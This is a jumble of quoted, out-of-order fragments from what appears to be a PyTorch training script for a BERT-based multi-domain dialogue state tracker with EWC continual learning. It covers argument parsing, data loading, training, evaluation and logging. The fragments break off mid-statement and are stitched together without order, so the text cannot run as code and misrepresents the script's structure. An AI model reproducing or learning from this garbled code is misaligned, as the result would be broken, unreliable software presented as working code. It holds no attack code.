longer than this", "you have fine-tuned ptr_model = torch.load(output_model_file, map_location=device) del_list = [] for key in", "len(eval_examples)) logger.info(\" Batch size = %d\", 1) eval_data = TensorDataset(all_input_ids, all_input_len, all_label_ids) #", "nb_eval_ex): eval_loss += loss.item() * nb_eval_ex eval_accuracy += acc.item() * nb_eval_ex if loss_slot", "if you want to set the label encoder trainable. \\n\" \"This option is", "prev_eval_acc_slot]), 'total_acc_slot': '\\t'.join([str(val[1].item()) for val in total_acc_slot]) } out_file_name = 'eval_results' if args.target_slot=='all':", "maximum total input turn length. \\n\" \"Sequences longer than this will be truncated,", "None, None prev_nb_dev_examples = 0 for step, batch in enumerate(tqdm(dev_dataloader, desc=\"Validation\")): batch =", "= example.guid.split('-')[1] curr_turn_idx = int(example.guid.split('-')[2]) if (prev_dialogue_idx is not None) and (prev_dialogue_idx !=", "if args.target_slot=='all': out_file_name += '_all' output_eval_file = os.path.join(args.output_dir, \"%s.txt\" % out_file_name) with open(output_eval_file,", "tokenizer.convert_tokens_to_ids(label_tokens) label_len = len(label_token_ids) label_padding = [0] * (max_seq_length - len(label_token_ids)) label_token_ids +=", "writer: total_class_acc = 0 total_slot_class_acc = [] nlabels = 0 for sid, slot", "self.prev_slot = [] self.target_slot_idx = sorted([ int(x) for x in config.target_slot.split(':')]) self.prev_slot_idx =", "label in enumerate(label): label = _hard_coding_label(label) label_id.append(label_map[i][label]) label_info += '%s (id = %d)", "vid, value in enumerate(slot): if not value == 0: class_acc = class_correct[sid][vid]/value writer.write(\"%s\\t%d\\t%d\\t%.3f\\n\"%(label_list[sid][vid],", "':'.join(target_slot) config.prev_slot = ':'.join(prev_slot) else: raise NotImplementedError() # sorting the ontology according to", "= domain if slot == \"pricerange\": slot = \"price range\" if idx in", "enumerate(examples): tokens_a = [x if x != '#' else '[SEP]' for x in", "f in features], dtype=torch.long) all_prev_label_ids = torch.tensor([f.prev_label_id for f in features], dtype=torch.long) #", "max_seq_length, tokenizer, device): features = [] for label in labels: label_tokens = [\"[CLS]\"]", "\"\"\"See base class.\"\"\" return self._create_examples( self._read_tsv(os.path.join(data_dir, \"train.tsv\")), \"train\", accumulation) def get_dev_examples(self, data_dir, accumulation=False):", "optimizer_grouped_parameters if n_gpu == 1: optimizer_grouped_parameters = get_optimizer_grouped_parameters(model) else: optimizer_grouped_parameters = get_optimizer_grouped_parameters(model.module) t_total", "label_ids, n_gpu, target_slot=target_slot_id) loss_ewc = ewc.penalty(model) loss = loss_ + args.lambda_ewc * loss_ewc", "Valid acc=%.6f, Valid prev loss=%.6f, Valid prev acc=%.6f ***\" \\ % (epoch, dev_loss,", "args.eval_batch_size) eval_data = TensorDataset(all_input_ids, all_input_len, all_label_ids, all_prev_label_ids) # Run prediction for full data", "DataLoader(eval_data, sampler=eval_sampler, batch_size=args.eval_batch_size) model.eval() eval_loss, eval_accuracy = 0, 0 eval_loss_slot, eval_acc_slot = None,", "= %d\" % max_turn) for (ex_index, example) in enumerate(examples): tokens_a = [x if", "the alphabetic order of the slots self.ontology = collections.OrderedDict(sorted(ontology.items())) # select slots to", "TODO ############################################################################### if args.do_analyze and (args.local_rank == -1 or torch.distributed.get_rank() == 0): pdb.set_trace()", "tokens_a = [x if x != '#' else '[SEP]' for x in tokenizer.tokenize(example.text_a)]", "-1 and args.task_name.find(\"lstm\") == -1: raise ValueError(\"Task name should include at least \\\"gru\\\"", "collection of `InputExample`s for the train set.\"\"\" raise NotImplementedError() def get_dev_examples(self, data_dir): \"\"\"Gets", "self.ontology = collections.OrderedDict(sorted(ontology.items())) # select slots to train self.target_slot = [] self.prev_slot =", "[\"[CLS]\"] + tokens_a + [\"[SEP]\"] input_len = [len(tokens), 0] if tokens_b: tokens +=", "help=\"The number of epochs to allow no further improvement.\") parser.add_argument(\"--warmup_proportion\", default=0.1, type=float, help=\"Proportion", "n_gpu, target_slot=target_slot_id) loss_ewc = ewc.penalty(model) loss = loss_ + args.lambda_ewc * loss_ewc else:", "1)) print(pred_slot[0, 0:10, 8:18].cpu() == torch.Tensor(none_value_id[8:18]).long().repeat(10, 1)) print(label_ids[0, 0:10, 0:8].cpu() == torch.Tensor(none_value_id[0:8]).long().repeat(10, 1))", "prev_label_info = _get_label(example.prev_label, prev_label_list) if ex_index < 5: logger.info(\"*** Example ***\") logger.info(\"guid: %s\"", "[len(tokens), 0] if tokens_b: tokens += tokens_b + [\"[SEP]\"] input_len[1] = len(tokens_b) +", "args.train_batch_size = int(args.train_batch_size / args.gradient_accumulation_steps) # Set the random seed manually for reproducibility.", "nb_dev_examples += num_valid_turn prev_nb_dev_examples += prev_num_valid_turn dev_loss = dev_loss / nb_dev_examples dev_acc =", "= {'attraction':'0:1:2', 'bus':'3:4:5:6', 'hospital':'7', 'hotel':'8:9:10:11:12:13:14:15:16:17',\\ 'restaurant':'18:19:20:21:22:23:24', 'taxi':'25:26:27:28', 'train':'29:30:31:32:33:34'} target_slot =[] prev_slot = []", "[{_label: i for i, _label in enumerate(labels)} for labels in label_list] for i,", "in range(nslot): for turn in range(nturn): class_count[slot][label_ids[0][turn][slot]]+=1 if label_ids[0][turn][slot] == pred_slot[0][turn][slot]: class_correct[slot][label_ids[0][turn][slot]] +=1", "where the model predictions and checkpoints will be written.\") parser.add_argument('--load_path', type=str, default='', help='pretrained", "last_update = epoch best_loss = dev_loss best_acc = dev_acc logger.info(\"*** Model Updated: Epoch=%d,", "nd in no_decay)], 'weight_decay': 0.01, 'lr': args.learning_rate}, {'params': [p for n, p in", "prev_loss, _, prev_acc, prev_acc_slot, _ = model(input_ids, input_len, prev_label_ids, n_gpu, target_slot=prev_slot_id) prev_loss =", "len(label_token_ids)) label_token_ids += label_padding assert len(label_token_ids) == max_seq_length features.append((label_token_ids, label_len)) all_label_token_ids = torch.tensor([f[0]", "model = torch.nn.DataParallel(model) if args.do_eval and (args.local_rank == -1 or torch.distributed.get_rank() == 0):", "0, 0 prev_eval_loss, prev_eval_accuracy = 0, 0 prev_eval_loss_slot, prev_eval_acc_slot = None, None nb_eval_examples_prev", "nb_eval_examples_prev = 0 for input_ids, input_len, label_ids, prev_label_ids in tqdm(eval_dataloader, desc=\"Evaluating\"): if input_ids.dim()", "> 1: model = torch.nn.DataParallel(model) if args.do_eval and (args.local_rank == -1 or torch.distributed.get_rank()", "or prev_dialogue_index != line[0]: text_a = line[2] text_b = line[3] prev_dialogue_index = line[0]", "to run analysis on the test set.\") parser.add_argument(\"--do_lower_case\", action='store_true', help=\"Set this flag if", "line[3] prev_dialogue_index = line[0] else: # The symbol '#' will be replaced with", "get_labels(self): \"\"\"See base class.\"\"\" return [ self.ontology[slot] for slot in self.target_slot] def get_prev_labels(self):", "prev_num_valid_turn dev_loss = dev_loss / nb_dev_examples dev_acc = dev_acc / nb_dev_examples prev_dev_loss =", "* loss_ewc prev_loss, _, prev_acc, prev_acc_slot, _ = model(input_ids, input_len, prev_label_ids, n_gpu, target_slot=prev_slot_id)", "all_input_len_dev, all_label_ids_dev, all_prev_label_ids_dev) dev_sampler = SequentialSampler(dev_data) dev_dataloader = DataLoader(dev_data, sampler=dev_sampler, batch_size=args.dev_batch_size) logger.info(\"Loaded data!\")", "torch.tensor([f[0] for f in features], dtype=torch.long).to(device) all_label_len = torch.tensor([f[1] for f in features],", "self._create_examples( self._read_tsv(os.path.join(data_dir, \"test.tsv\")), \"test\", accumulation) def get_labels(self): \"\"\"See base class.\"\"\" return [ self.ontology[slot]", "\\ _post_process(prev_eval_loss, prev_eval_loss_slot, prev_eval_accuracy, prev_eval_acc_slot, \\ prev_loss, prev_loss_slot, prev_acc, prev_acc_slot, nb_eval_ex_prev) eval_loss /=", "n, p in model.named_parameters() if p.requires_grad] no_decay = ['bias', 'LayerNorm.bias', 'LayerNorm.weight'] optimizer_grouped_parameters =", "args.do_train else None result = {'eval_loss': eval_loss, 'eval_accuracy': eval_accuracy, 'loss': loss, 'eval_loss_slot':'\\t'.join([ str(val/", "TensorDataset, DataLoader, RandomSampler, SequentialSampler from torch.utils.data.distributed import DistributedSampler from pytorch_pretrained_bert.tokenization import BertTokenizer from", "eval_loss_slot, eval_accuracy, eval_acc_slot, loss, loss_slot, acc, acc_slot, nb_eval_ex) prev_eval_loss, prev_eval_loss_slot, prev_eval_accuracy, prev_eval_acc_slot =", "of Previous task target_label_list = processor.get_labels() # Slot value labels of Present task", "target_label_list = processor.get_labels() # Slot value labels of Present task label_list = prev_label_list", "get_label_embedding(labels, args.max_label_length, tokenizer, device) label_token_ids.append(token_ids) label_len.append(lens) ## Get slot-type embeddings ## Note: slot", "all_label_ids, all_prev_label_ids) if args.local_rank == -1: train_sampler = RandomSampler(train_data) else: train_sampler = DistributedSampler(train_data)", "+= loss.item() * nb_eval_ex eval_accuracy += acc.item() * nb_eval_ex if loss_slot is not", "= DDP(model) elif n_gpu > 1: model = torch.nn.DataParallel(model) # Prepare optimizer if", "# list of slots in present task # tokenizer vocab_dir = os.path.join(args.bert_dir, '%s-vocab.txt'", "summary_writer.add_scalar(\"Train/Loss_EWC\", loss_ewc, global_step) summary_writer.add_scalar(\"Train/Loss_Total\", loss, global_step) summary_writer.add_scalar(\"Train/JointAcc\", acc, global_step) if n_gpu == 1:", "import EWC model = BeliefTracker(args, num_labels, device) if args.fp16: model.half() # Load pretrained", "/ prev_nb_dev_examples if summary_writer is not None: summary_writer.add_scalar(\"Validate/Loss\", dev_loss, global_step) summary_writer.add_scalar(\"Validate/Acc\", dev_acc, global_step)", "{}\".format( device, n_gpu, bool(args.local_rank != -1), args.fp16)) if args.gradient_accumulation_steps < 1: raise ValueError(\"Invalid", "target_slot=prev_slot_id) else: loss, loss_slot, acc, acc_slot, _ = model(input_ids, input_len, label_ids, n_gpu, target_slot=target_slot_id)", "target_slot_id = list(range(len(processor.prev_slot), len(processor.all_slot))) # list of slots in present task # tokenizer", "tokenizer.tokenize(example.text_a)] tokens_b = None if example.text_b: tokens_b = [x if x != '#'", "will be padded.\") parser.add_argument(\"--max_turn_length\", default=22, type=int, help=\"The maximum total input turn length. \\n\"", "args.max_seq_length, tokenizer, args.max_turn_length) logger.info(\"***** Running training *****\") logger.info(\" Num examples = %d\", len(train_examples))", "BeliefTracker elif args.nbt == 'transformer': from BeliefTrackerSlotQueryMultiSlotTransformer import BeliefTracker from BeliefTrackerSlotQueryMultiSlotEWC import EWC", "if args.local_rank != -1: try: from apex.parallel import DistributedDataParallel as DDP except ImportError:", "% slot.replace(' ','_'), prev_dev_loss_slot[i]/prev_nb_dev_examples, global_step) summary_writer.add_scalar(\"Validate/Prev_Acc_%s\" % slot.replace(' ','_'), prev_dev_acc_slot[i], global_step) logger.info(\"*** Model", "== 2: input_ids = input_ids.unsqueeze(0) input_len = input_len.unsqueeze(0) label_ids = label_ids.unsuqeeze(0) prev_label_ids =", "loss = loss_ + args.lambda_ewc * ewc.penalty(model) prev_loss, prev_loss_slot, prev_acc, prev_acc_slot, _ =", "be written.\") parser.add_argument('--load_path', type=str, default='', help='pretrained model directory name') parser.add_argument(\"--target_slot\", default='', type=str, required=True,", "not empty.\".format(args.output_dir)) os.makedirs(args.output_dir, exist_ok=True) task_name = args.task_name.lower() tb_file_name = args.output_dir.split('/')[1] # Tensorboard logging", "in n for nd in no_decay)], 'weight_decay': 0.0, 'lr': args.learning_rate}, ] return optimizer_grouped_parameters", "= model(input_ids, input_len, prev_label_ids, n_gpu, target_slot=prev_slot_id) else: loss_, _, acc, acc_slot, _ =", "for x in config.prev_slot.split(':')]) ontology_items = list(self.ontology.items()) for idx, domain in enumerate(ontology_items): slot,", "all_label_token_ids, all_label_len def _truncate_seq_pair(tokens_a, tokens_b, max_length): \"\"\"Truncates a sequence pair in place to", "oldtask=prev_slot_id, num_labels=num_labels, device=device, n_gpu=n_gpu) for epoch in trange(int(args.num_train_epochs), desc=\"Epoch\"): # for epoch in", "eval_acc_slot eval_loss, eval_loss_slot, eval_accuracy, eval_acc_slot = \\ _post_process(eval_loss, eval_loss_slot, eval_accuracy, eval_acc_slot, loss, loss_slot,", "as writer: for dialog in incorrect_dialogs: for turn in dialog: text = turn['input']", "# \" + text_b else: text_a = line[2] # line[2]: user utterance text_b", "line[0], line[1]) # line[0]: dialogue index, line[1]: turn index if accumulation: if prev_dialogue_index", "5: logger.info(\"*** Example ***\") logger.info(\"guid: %s\" % example.guid) logger.info(\"tokens: %s\" % \" \".join([str(x)", "tb_file_name = args.output_dir.split('/')[1] # Tensorboard logging if not args.do_not_use_tensorboard: summary_writer = SummaryWriter(\"./%s/%s\" %", "tokenizer, device) label_token_ids.append(token_ids) label_len.append(lens) ## Get slot-type embeddings ## Note: slot embeddings are", "num_valid_turn for i, l in enumerate(prev_loss_slot): prev_dev_loss_slot[i] = prev_dev_loss_slot[i] + l * prev_num_valid_turn", "import DistributedSampler from pytorch_pretrained_bert.tokenization import BertTokenizer from pytorch_pretrained_bert.optimization import BertAdam from tensorboardX import", "x / warmup return 1.0 - x ############################################################################### # Main ############################################################################### def main():", "of epochs to allow no further improvement.\") parser.add_argument(\"--warmup_proportion\", default=0.1, type=float, help=\"Proportion of training", "16-bit float precision instead of 32-bit\") parser.add_argument('--loss_scale', type=float, default=0, help=\"Loss scaling to improve", "= None #### EWC: calculate Fisher ewc = EWC(model, dev_dataloader, oldtask=prev_slot_id, num_labels=num_labels, device=device,", "== 1: optimizer_grouped_parameters = get_optimizer_grouped_parameters(model) else: optimizer_grouped_parameters = get_optimizer_grouped_parameters(model.module) t_total = num_train_steps if", "def get_train_examples(self, data_dir, accumulation=False): \"\"\"See base class.\"\"\" return self._create_examples( self._read_tsv(os.path.join(data_dir, \"train.tsv\")), \"train\", accumulation)", "0: optimizer = FP16_Optimizer(optimizer, dynamic_loss_scale=True) else: optimizer = FP16_Optimizer(optimizer, static_loss_scale=args.loss_scale) else: optimizer =", "tensors to [batch, turn, word] all_input_ids = all_input_ids.view(-1, max_turn_length, max_seq_length) all_input_len = all_input_len.view(-1,", "+= prev_acc.item() * prev_num_valid_turn if n_gpu == 1: if dev_loss_slot is None: dev_loss_slot", "% (key, str(result[key]))) ############################################################################### # Analyze: TODO ############################################################################### if args.do_analyze and (args.local_rank ==", "line[3] + \" # \" + text_b else: text_a = line[2] # line[2]:", "[0, 0] max_turn = 0 for (ex_index, example) in enumerate(examples): if max_turn <", "= False print('hotel') print(label_ids[0, 0:10, 8:18].cpu() == torch.Tensor(none_value_id[8:18]).long().repeat(10, 1)) print(pred_slot[0, 0:10, 8:18].cpu() ==", "slot.replace(' ','_'), dev_acc_slot[i], global_step) for i, slot in enumerate(processor.prev_slot): summary_writer.add_scalar(\"Validate/Prev_Loss_%s\" % slot.replace(' ','_'),", "############################################################################### def main(): parser = argparse.ArgumentParser() ## Required parameters parser.add_argument('--data_dir', type=str, required=True, help='location", "with \"- 2\" if len(tokens_a) > max_seq_length - 2: tokens_a = tokens_a[:(max_seq_length -", "tokens])) logger.info(\"input_ids: %s\" % \" \".join([str(x) for x in input_ids])) logger.info(\"input_len: %s\" %", "NOT Updated: Epoch=%d, Validation Loss=%.6f, Validation Acc=%.6f ***\" % (epoch, dev_loss, dev_acc)) #if", "0: class_acc = class_correct[sid][vid]/value writer.write(\"%s\\t%d\\t%d\\t%.3f\\n\"%(label_list[sid][vid], class_correct[sid][vid], value, class_acc) ) slot_class_acc += class_acc nlabels", "= input_len self.label_id = label_id self.prev_label_id = prev_label_id # trained slots in previous", "prev_slot_dim) return all_input_ids, all_input_len, all_label_ids, all_prev_label_ids def get_label_embedding(labels, max_seq_length, tokenizer, device): features =", "fp16 set to True.\\n\" \"0 (default value): dynamic loss scaling.\\n\" \"Positive power of", "in label_list: token_ids, lens = get_label_embedding(labels, args.max_label_length, tokenizer, device) label_token_ids.append(token_ids) label_len.append(lens) ## Get", "eval_loss_slot = [ l * nb_eval_ex for l in loss_slot] else: for i,", "prev_eval_acc_slot = \\ _post_process(prev_eval_loss, prev_eval_loss_slot, prev_eval_accuracy, prev_eval_acc_slot, \\ prev_loss, prev_loss_slot, prev_acc, prev_acc_slot, nb_eval_ex_prev)", "in batch) input_ids, input_len, label_ids, _ = batch if n_gpu == 1: loss_,", "all_label_ids.to(device), all_prev_label_ids.to(device) train_data = TensorDataset(all_input_ids, all_input_len, all_label_ids, all_prev_label_ids) if args.local_rank == -1: train_sampler", "datefmt='%m/%d/%Y %H:%M:%S', level=logging.INFO) logger = logging.getLogger(__name__) ############################################################################### # Data Preprocessing ############################################################################### class InputExample(object):", "bert-lstm-label-embedding\") parser.add_argument(\"--output_dir\", default=None, type=str, required=True, help=\"The output directory where the model predictions and", "acc_slot.mean(0) loss_ewc = ewc.penalty(model) loss = loss_ + args.lambda_ewc * loss_ewc if args.gradient_accumulation_steps", "import argparse import random import collections import operator from tqdm import tqdm, trange", "in features], dtype=torch.long) all_input_len= torch.tensor([f.input_len for f in features], dtype=torch.long) all_label_ids = torch.tensor([f.label_id", "labels) def warmup_linear(x, warmup=0.002): if x < warmup: return x / warmup return", "True.\") ############################################################################### # Load data ############################################################################### # Get Processor processor = Processor(args) prev_label_list", "prev_dev_acc_slot / prev_nb_dev_examples if summary_writer is not None: summary_writer.add_scalar(\"Validate/Loss\", dev_loss, global_step) summary_writer.add_scalar(\"Validate/Acc\", dev_acc,", "1: loss = loss / args.gradient_accumulation_steps if args.fp16: optimizer.backward(loss) else: loss.backward() if summary_writer", "nb_eval_examples) for val in eval_loss_slot]), 'eval_acc_slot':'\\t'.join([ str((val).item()) for val in eval_acc_slot]), 'prev_eval_loss': prev_eval_loss,", "prev_label_id=prev_label_id, )) prev_dialogue_idx = curr_dialogue_idx prev_turn_idx = curr_turn_idx if prev_turn_idx < max_turn_length: features", "= _hard_coding_label(label) label_id.append(label_map[i][label]) label_info += '%s (id = %d) ' % (label, label_map[i][label])", "for labels in label_list] # Number of labels of all slots #prev_slot_id =", "args.max_turn_length) all_input_ids, all_input_len, all_label_ids, all_prev_label_ids \\ = all_input_ids.to(device), all_input_len.to(device), all_label_ids.to(device), all_prev_label_ids.to(device) logger.info(\"***** Running", "## Dev ## utterances all_input_ids_dev, all_input_len_dev, all_label_ids_dev, all_prev_label_ids_dev = convert_examples_to_features( dev_examples, target_label_list, prev_label_list,", "total_class_acc = 0 total_slot_class_acc = [] nlabels = 0 for sid, slot in", "the label encoder trainable. \\n\" \"This option is valid only when using label", "# Load a trained model that you have fine-tuned ptr_model = torch.load(output_model_file, map_location=device)", "} out_file_name = 'eval_results' if args.target_slot=='all': out_file_name += '_all' output_eval_file = os.path.join(args.output_dir, \"%s.txt\"", "collections.OrderedDict(sorted(ontology.items())) # select slots to train self.target_slot = [] self.prev_slot = [] self.target_slot_idx", "0 if prev_dialogue_idx is None or prev_turn_idx < max_turn_length: features.append(InputFeatures(input_ids=input_ids, input_len=input_len, label_id=label_id, prev_label_id=prev_label_id,", "slot_idx = {'attraction':'0:1:2', 'bus':'3:4:5:6', 'hospital':'7', 'hotel':'8:9:10:11:12:13:14:15:16:17',\\ 'restaurant':'18:19:20:21:22:23:24', 'taxi':'25:26:27:28', 'train':'29:30:31:32:33:34'} target_slot =[] prev_slot =", "1: optimizer_grouped_parameters = get_optimizer_grouped_parameters(model) else: optimizer_grouped_parameters = get_optimizer_grouped_parameters(model.module) t_total = num_train_steps if args.local_rank", "args.max_turn_length) all_input_ids, all_input_len, all_label_ids = all_input_ids.to(device), all_input_len.to( device), all_label_ids.to(device) logger.info(\"***** Running analysis *****\")", "dev_loss_slot is None: dev_loss_slot = [ l * num_valid_turn for l in loss_slot]", "type=str, required=True, help=\"Bert pre-trained model selected in the list: bert-base-uncased, \" \"bert-large-uncased, bert-base-cased,", "if not args.do_train and not args.do_eval and not args.do_analyze: raise ValueError(\"At least one", "epochs to perform.\") parser.add_argument(\"--patience\", default=10.0, type=float, help=\"The number of epochs to allow no", "if args.local_rank == -1 or args.no_cuda: device = torch.device(\"cuda\" if torch.cuda.is_available() and not", "/ args.gradient_accumulation_steps if args.fp16: optimizer.backward(loss) else: loss.backward() if summary_writer is not None: summary_writer.add_scalar(\"Epoch\",", "label_len, slot_token_ids, slot_len) if args.local_rank != -1: try: from apex.parallel import DistributedDataParallel as", "bool(args.local_rank != -1), args.fp16)) if args.gradient_accumulation_steps < 1: raise ValueError(\"Invalid gradient_accumulation_steps parameter: {},", "loss / args.gradient_accumulation_steps if args.fp16: optimizer.backward(loss) else: loss.backward() if summary_writer is not None:", "training: {}\".format( device, n_gpu, bool(args.local_rank != -1), args.fp16)) if args.gradient_accumulation_steps < 1: raise", "0, 0 eval_loss_slot, eval_acc_slot = None, None nb_eval_steps, nb_eval_examples = 0, 0 prev_eval_loss,", "learning rate warmup for. \" \"E.g., 0.1 = 10%% of training.\") parser.add_argument(\"--lambda_ewc\", default=0.1,", "in rename_list: new_key = key.replace('rnn.', 'nbt.') ptr_model[new_key] = ptr_model[key] del ptr_model[key] state =", "type=str, required=False, help=\"Tensorboard directory\") parser.add_argument(\"--nbt\", default='rnn', type=str, required=True, help=\"nbt type: rnn or transformer", "slot_token_ids, slot_len) if args.local_rank != -1: try: from apex.parallel import DistributedDataParallel as DDP", "nslot = label_ids.size(2) for slot in range(nslot): for turn in range(nturn): class_count[slot][label_ids[0][turn][slot]]+=1 if", "input_len, label_ids, n_gpu, target_slot=target_slot_id) loss_ewc = ewc.penalty(model) loss = loss_ + args.lambda_ewc *", "all_input_len, all_label_ids, all_prev_label_ids = convert_examples_to_features( train_examples, target_label_list, prev_label_list, args.max_seq_length, tokenizer, args.max_turn_length) logger.info(\"***** Running", "key, value in slot_idx.items(): if key == config.target_slot: target_slot.append(value) else: prev_slot.append(value) config.target_slot =", "import TensorDataset, DataLoader, RandomSampler, SequentialSampler from torch.utils.data.distributed import DistributedSampler from pytorch_pretrained_bert.tokenization import BertTokenizer", "input_ids += [0] * (max_seq_length - len(input_ids)) # Note: padding idx = 0", "slot == \"pricerange\": slot = \"price range\" if idx in self.target_slot_idx: self.target_slot.append(slot) elif", "transformer or turn\" ) parser.add_argument(\"--fix_utterance_encoder\", action='store_true', help=\"Do not train BERT utterance encoder\") ##", "all_prev_label_ids_dev = \\ all_input_ids_dev.to(device), all_input_len_dev.to(device), all_label_ids_dev.to(device), all_prev_label_ids_dev.to(device) dev_data = TensorDataset(all_input_ids_dev, all_input_len_dev, all_label_ids_dev, all_prev_label_ids_dev)", "total_acc_slot]) } out_file_name = 'eval_results' if args.target_slot=='all': out_file_name += '_all' output_eval_file = os.path.join(args.output_dir,", "# select slots to train self.target_slot = [] self.prev_slot = [] self.target_slot_idx =", "type=str, required=True, help=\"The name of the task to train: bert, bert-gru, bert-lstm, \"", "* (max_seq_length - len(input_ids)) # Note: padding idx = 0 assert len(input_ids) ==", "turn['pred']): text += '%s\\t%s\\t'%(label, pred) writer.write(\"%s\\n\" % text) writer.write(\"---------- \\n\") logger.info(\"Done analysis: %s\"", "'hospital':'7', 'hotel':'8:9:10:11:12:13:14:15:16:17',\\ 'restaurant':'18:19:20:21:22:23:24', 'taxi':'25:26:27:28', 'train':'29:30:31:32:33:34'} target_slot =[] prev_slot = [] for key, value", "precision instead of 32-bit\") parser.add_argument('--loss_scale', type=float, default=0, help=\"Loss scaling to improve fp16 numeric", "= [] for key, value in slot_idx.items(): if key == config.target_slot: target_slot.append(value) else:", "logger.info(\"tokens: %s\" % \" \".join([str(x) for x in tokens])) logger.info(\"input_ids: %s\" % \"", "= convert_examples_to_features( eval_examples, target_label_list, prev_label_list, args.max_seq_length, tokenizer, args.max_turn_length) all_input_ids, all_input_len, all_label_ids, all_prev_label_ids \\", "line[2]: user utterance text_b = line[3] # line[3]: system response label = [", "target_slot=target_slot_id) loss_ewc = ewc.penalty(model) loss = loss_ + args.lambda_ewc * loss_ewc else: loss_,", "# CUDA setting if args.local_rank == -1 or args.no_cuda: device = torch.device(\"cuda\" if", "= {'eval_loss': eval_loss, 'eval_accuracy': eval_accuracy, 'loss': loss, 'eval_loss_slot':'\\t'.join([ str(val/ nb_eval_examples) for val in", "training task self.prev_label = prev_label # trained slots in previous tasks class InputFeatures(object):", "EWC\") parser.add_argument(\"--no_cuda\", action='store_true', help=\"Whether not to use CUDA when available\") parser.add_argument(\"--local_rank\", type=int, default=-1,", "== 'transformer': from BeliefTrackerSlotQueryMultiSlotTransformer import BeliefTracker from BeliefTrackerSlotQueryMultiSlotEWC import EWC else: raise ValueError('nbt", "acc, acc_slot, nb_eval_ex) prev_eval_loss, prev_eval_loss_slot, prev_eval_accuracy, prev_eval_acc_slot = \\ _post_process(prev_eval_loss, prev_eval_loss_slot, prev_eval_accuracy, prev_eval_acc_slot,", "class_correct[sid][vid], value, -1) ) total_slot_class_acc.append(slot_class_acc/(vid+1)) total_class_acc+=slot_class_acc total_class_acc /= nlabels for sid, slot_acc in", "[PAD]', '') text['label'] = [str(label_list[idx][x]) for idx, x in enumerate(label.cpu().numpy())] text['pred'] = [str(label_list[idx][x])", "bert-lstm, \" \"bert-label-embedding, bert-gru-label-embedding, bert-lstm-label-embedding\") parser.add_argument(\"--output_dir\", default=None, type=str, required=True, help=\"The output directory where", "= sorted([ int(x) for x in config.prev_slot.split(':')]) ontology_items = list(self.ontology.items()) for idx, domain", "logger.info(\" Batch size = %d\", 1) eval_data = TensorDataset(all_input_ids, all_input_len, all_label_ids) # Run", "None accumulation = False if args.do_train: train_examples = processor.get_train_examples(args.data_dir, accumulation=accumulation) dev_examples = processor.get_dev_examples(args.data_dir,", "all_label_ids, all_prev_label_ids def get_label_embedding(labels, max_seq_length, tokenizer, device): features = [] for label in", "steps to accumulate before performing a backward/update pass.\") parser.add_argument('--fp16', action='store_true', help=\"Whether to use", "'eval_accuracy': eval_accuracy, 'loss': loss, 'eval_loss_slot':'\\t'.join([ str(val/ nb_eval_examples) for val in eval_loss_slot]), 'eval_acc_slot':'\\t'.join([ str((val).item())", "global_step) if n_gpu == 1: for i, slot in enumerate(processor.target_slot): summary_writer.add_scalar(\"Train/Loss_%s\" % slot.replace('", "= None, None prev_nb_dev_examples = 0 for step, batch in enumerate(tqdm(dev_dataloader, desc=\"Validation\")): batch", "torch.Tensor(none_value_id[0:8]).long().repeat(10, 1)) print(label_ids[0, 0:10, 18:].cpu() == torch.Tensor(none_value_id[18:]).long().repeat(10, 1)) pdb.set_trace() if drawfig == True:", "prev_label_list, max_seq_length, tokenizer, max_turn_length): \"\"\"Loads a data file into a list of `InputBatch`s.\"\"\"", "input_ids = input_ids.unsqueeze(0) input_len = input_len.unsqueeze(0) label_ids = label_ids.unsuqeeze(0) with torch.no_grad(): _, _,", "to train: bert, bert-gru, bert-lstm, \" \"bert-label-embedding, bert-gru-label-embedding, bert-lstm-label-embedding\") parser.add_argument(\"--output_dir\", default=None, type=str, required=True,", "\"Sequences longer than this will be truncated, and sequences shorter \\n\" \"than this", "input_len[1] = len(tokens_b) + 1 input_ids = tokenizer.convert_tokens_to_ids(tokens) # Zero-pad up to the", "eval_accuracy = eval_accuracy / nb_eval_examples prev_eval_loss = prev_eval_loss / nb_eval_examples_prev prev_eval_accuracy = prev_eval_accuracy", "no further improvement.\") parser.add_argument(\"--warmup_proportion\", default=0.1, type=float, help=\"Proportion of training to perform linear learning", "elif args.nbt =='turn': from BeliefTrackerSlotQueryMultiSlotTurn import BeliefTracker elif args.nbt == 'transformer': from BeliefTrackerSlotQueryMultiSlotTransformer", "model(input_ids, input_len, label_ids, n_gpu, target_slot=target_slot_id) loss_ewc = ewc.penalty(model) loss = loss_ + args.lambda_ewc", "for val in total_acc_slot]) } out_file_name = 'eval_results' if args.target_slot=='all': out_file_name += '_all'", "'prev_eval_acc_slot': '\\t'.join([str((val).item()) for val in prev_eval_acc_slot]), 'total_acc_slot': '\\t'.join([str(val[1].item()) for val in total_acc_slot]) }", "\\n\") parser.add_argument(\"--distance_metric\", type=str, default=\"cosine\", help=\"The metric for distance between label embeddings: cosine, euclidean.\")", "x in enumerate(pred.cpu().numpy())] dialog.append(text) incorrect_dialogs.append(dialog) output_eval_incorr_file = os.path.join(args.output_dir, \"incorrect_dialog.txt\") with open(output_eval_incorr_file, \"w\") as", "open(os.path.join(config.data_dir, \"ontology.json\"), \"r\") ontology = json.load(fp_ontology) for slot in ontology.keys(): ontology[slot].append(\"none\") fp_ontology.close() if", "= plt.subplots(nturn, 1, figsize=(50, 10*nturn)) print(\"Slot\", slot) for turn in range(nturn): draw(attn_scores[slot*label_ids.size(1)+turn,:,:].cpu(), tokenizer.convert_ids_to_tokens(input_ids[0][turn].cpu().numpy()),", "10*nturn)) print(\"Slot\", slot) for turn in range(nturn): draw(attn_scores[slot*label_ids.size(1)+turn,:,:].cpu(), tokenizer.convert_ids_to_tokens(input_ids[0][turn].cpu().numpy()), [*range(0, args.attn_head)], ax=axs[turn]) axs[turn].set_title(\"turn", "= curr_dialogue_idx prev_turn_idx = curr_turn_idx if prev_turn_idx < max_turn_length: features += [InputFeatures(input_ids=all_padding, input_len=all_padding_len,", "= csv.reader(f, delimiter=\"\\t\", quotechar=quotechar) lines = [] for line in reader: if len(line)", "= EWC(model, dev_dataloader, oldtask=prev_slot_id, num_labels=num_labels, device=device, n_gpu=n_gpu) for epoch in trange(int(args.num_train_epochs), desc=\"Epoch\"): #", "def _create_examples(self, lines, set_type, accumulation=False): \"\"\"Creates examples for the training and dev sets.\"\"\"", "all_input_len.view(-1, max_turn_length, 2) all_label_ids = all_label_ids.view(-1, max_turn_length, slot_dim) all_prev_label_ids = all_prev_label_ids.view(-1, max_turn_length, prev_slot_dim)", "help=\"Total batch size for validation.\") parser.add_argument(\"--eval_batch_size\", default=16, type=int, help=\"Total batch size for eval.\")", "text_b self.label = label # Target slots in this training task self.prev_label =", "training epochs to perform.\") 